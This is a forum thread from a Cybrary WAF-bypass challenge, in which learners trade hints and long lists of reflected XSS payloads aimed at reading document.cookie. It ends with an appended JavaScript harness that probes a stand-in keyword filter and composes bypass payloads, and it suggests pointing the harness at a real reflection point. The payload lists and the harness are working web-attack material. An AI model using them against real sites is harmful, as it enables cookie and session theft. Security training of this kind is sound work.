Bypassing Web Application Firewalls 1.3 Challenge Exercise

I’m trying to bypass the WAF in order to capture the flag. I’ve tested all the “Guided Exercise” commands. The word “javascript” is blocked by the WAF. I also tried things like “jaascrpt” or “ja vascri pt” and got nothing. I was wondering if someone could give me a hint so I can get to the point!
Thanks in Advance!

Hey there - this isn’t really my area of expertise, but working backwards from the instructor’s solution notes, I’d say you don’t necessarily need to use that javascript directive from Part 4 to get the flag.

Broadly speaking, I would recommend:

Seeing which meta characters and special characters work.
Seeing which basic HTML elements work.
Seeing if any attributes work (e.g. src=, data=)
Reviewing the core concept lesson for additional techniques.

It also helps to come back to this challenge later. All challenge exercises are optional, and you may benefit from completing additional lab work from other parts of the path first.

I tried several possible approaches (such as character codes, using decimal, etc.) to bypass it, but none of them worked. I’m just curious what solution Cybrary expected me to find.

You are trying to steal the cookie. One hint I can give is that what may not work in the Guided Exercises might just work in the Challenge.

Please write a list of the things you have tried :) I’ll edit them if I think they give too much away :)

Here is the list of things I’ve tried so far:

asdf>"'<img src=x>
asdf>"'<img src=x onerror=alert(1234);>
asdf>"'<img src=x onerror=console.log(document.cookie);>
asdf>"'<img src=x onerror=document.write(document.cookie);>
asdf>"'<img src=x onerror=prompt(document.cookie);> 
asdf>"'<img src=x onaaaaa= >
asdf>"'<a href="">CLICK</a>
asdf>"'<a href="javascript:aaa">CLICK</a>
asdf>"'<a href="javascript:prompt()">CLICK</a>
asdf>"'<a href="javascript:prompt(document.cookie)">CLICK</a>
asdf>"'<a href="jav&#97;script:prompt(document.cookie)">CLICK</a>
asdf>"'<a href="jav&#0Aascript:prompt(document.cookie)">CLICK</a>
asdf>"'<a href="jav   ascript:pro   mpt(document.cookie)">CLICK</a>
asdf>"'<a href="jav*ascript:pro*mpt(document.cookie)">CLICK</a>
asdf>"'<a href=""jav"+"ascript":prompt(document.cookie)">CLICK</a>
asdf>"'<a href="top["jav"+"ascript]:prompt(document.cookie)">CLICK</a>
asdf>"'<a href="&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;:prompt(document.cookie)">CLICK</a>
asdf>"'<a href="&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#112;&#114;&#111;&#109;&#112;&#116;&#40;&#100;&#111;&#99;&#117;&#109;&#101;&#110;&#116;&#46;&#99;&#111;&#111;&#107;&#105;&#101;&#41;">CLICK</a>
asdf>"'<a href="amF2YXNjcmlwdDpwcm9tcHQoZG9jdW1lbnQuY29va2llKQ==">CLICK</a>

and more.
I also tried in both the Guided and Challenge Exercise labs, but nothing changed.
Thanks for your time!

I sent you a private message :)

I thought I should use a combination of HTML and JavaScript code somehow. I don’t know if it works, by the way.
Thank you.

I have tried so many combinations and nothing has worked so far. It doesn’t like the javascript wrapper, and I changed that to encoded characters too. Tried different event handler combinations too. Prompts are not working either.

Think simpler. Less is more on this one…

1.) Do script tags work? They may not have in the guided exercises but they may here.

2.) You are trying to steal document.cookie


Thank you @JosephWhite


Is there any chance I could get some help? Stuck on this for about an hour. Tried multiple combinations. I think I get what you were hinting at regarding trying some things that weren’t working before with script in lesson 3/4 but might work now, like “console.log(document.cookie)”, “document.write(document.cookie)”, etc. I think I’m supposed to use document.write, but I’m not sure, because I had the least errors with it.

I tried using a href, tried using onaaaa, alert, etc. I’m just confused and I don’t know if I’m going in the right direction or not. I see the CLICK a href thing shows up, but it doesn’t seem to like the word “javascript”, so I also tried script, tried changing capitalization. I just don’t know anymore :(

Here is what the challenge author says…

  • See which meta characters and special characters work

  • See which basic HTML elements work
    Many do work, when it previously did not.

  • See if any attributes work (e.g. src= , data=)
    Most should work

  • See if event handlers work

  • See if various actions work from before

Sadly it’s too vague for me. I know src=x works, but I have no idea how to turn that into anything that would allow me to read document.cookie without being able to use an event handler or javascript, like the solution was in part 4. I can get the CLICK link to show up if I use a href, but again I’m not able to weaponize anything from that. I’ve tried combining and mismatching, but I don’t understand enough to know what I’m doing on my own. It basically drops you into the deep end. Is it possible to get a DM or something? I’m really struggling.

For example, anything with “asdf>”'" combined with onerror prompt cookie (onerror, onalert, on anything) doesn’t work.

So I thought to try and combine img src=x with “'<a href=” because it works, but as soon as I try to use javascript it doesn’t work. I’m guessing this means the WAF is blocking this word. So how would I be able to proceed? There were no examples previously showing alternatives. Also, how to use data=? There were also no examples of how to use that to try and get document.cookie. There should be more examples of other templates or cheat sheets to try. This challenge feels too random; the possibilities are endless.

I even went elsewhere to look at cheat sheets and reflected XSS blogs and I’m still lost.

All event handlers seem not to work (onmouse, onalert, on x).
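As an added example (not from the course, the instructor, or any poster in this thread): the probing order the challenge author recommends (meta characters, then elements, then attributes, then event handlers, then actions) can be turned into a small harness that tests each primitive on its own before composing a payload, instead of guessing at whole payloads. The filter below is a constructed stand-in, not the lab's WAF: it blocks the substring “javascript” (in any case), any on*= event-handler attribute, and alert(), which is what the posters report seeing. The probe lists, the CONTEXT_BREAK prefix and the composition step are assumptions made for illustration; in the lab you would send each probe to the reflected parameter and check whether it is reflected unmodified.

```javascript
// Constructed stand-in for a keyword-style WAF. NOT the lab's filter:
// the rules only model what the thread reports as blocked.
const BLOCK_RULES = [
  { name: 'javascript-uri', re: /javascript/i },       // "javascript" in any case
  { name: 'event-handler',  re: /\bon[a-z]+\s*=/i },   // onerror=, onload=, onaaaa=, ...
  { name: 'alert-call',     re: /\balert\s*\(/i },     // alert( in any case
];

// Returns the name of the first rule that matches, or null if the payload passes.
function classify(payload) {
  for (const rule of BLOCK_RULES) {
    if (rule.re.test(payload)) return rule.name;
  }
  return null;
}

// One probe list per category, in the order the challenge author suggests.
// Each item is deliberately tiny so a block can be attributed to one primitive.
const PROBES = {
  metaChars:  ['<', '>', '"', "'", '/', '=', '(', ')', ';', '&#'],
  elements:   ['<img>', '<a>', '<svg>', '<script>', '<iframe>'],
  attributes: ['src=x', 'href=x', 'data=x', 'id=x'],
  schemes:    ['javascript:1', 'data:text/html,x', 'http://x'],
  handlers:   ['onerror=1', 'onload=1', 'onmouseover=1', 'onaaaa=1'],
  actions:    ['document.cookie', 'document.write(document.cookie)',
               'prompt(document.cookie)', 'alert(document.cookie)'],
};

// Runs every probe through the filter and returns, per category,
// which probes passed and which rule stopped the rest.
function probe(filter = classify) {
  const report = {};
  for (const [category, items] of Object.entries(PROBES)) {
    report[category] = { passed: [], blocked: {} };
    for (const item of items) {
      const hit = filter(item);
      if (hit) report[category].blocked[item] = hit;
      else report[category].passed.push(item);
    }
  }
  return report;
}

// Attribute/tag break-out prefix, the same one the posters used (assumption:
// the reflection point sits inside a quoted attribute).
const CONTEXT_BREAK = 'asdf>"\'';

// Composes candidate payloads ONLY from primitives that passed individually,
// then re-checks the whole string, because a filter may match the combination
// even when each part was allowed.
function composeCandidates(filter = classify) {
  const report = probe(filter);
  const candidates = [];
  // Simplest route first: a bare <script> element around an allowed action.
  if (report.elements.passed.includes('<script>')) {
    for (const action of report.actions.passed) {
      candidates.push(`${CONTEXT_BREAK}<script>${action}</script>`);
    }
  }
  // Fallback route: an <img> with an allowed event handler (none in this stand-in).
  if (report.elements.passed.includes('<img>')) {
    for (const handler of report.handlers.passed) {
      const name = handler.split('=')[0];
      for (const action of report.actions.passed) {
        candidates.push(`${CONTEXT_BREAK}<img src=x ${name}=${action}>`);
      }
    }
  }
  return candidates.filter((p) => filter(p) === null);
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(probe(), null, 2));
  console.log(composeCandidates());
}
```

Against this stand-in the report shows every element and attribute passing, every event handler and the javascript: scheme blocked, and `<script>` plus `document.write(document.cookie)` surviving the whole-payload re-check, which is the “less is more” observation in the hint: when the filter is keyed on the URI scheme and on*= handlers, the plainest element can be the one it forgot. Swap `classify` for a function that actually submits the probe and reports whether it came back intact, and the same harness works against a real reflection point.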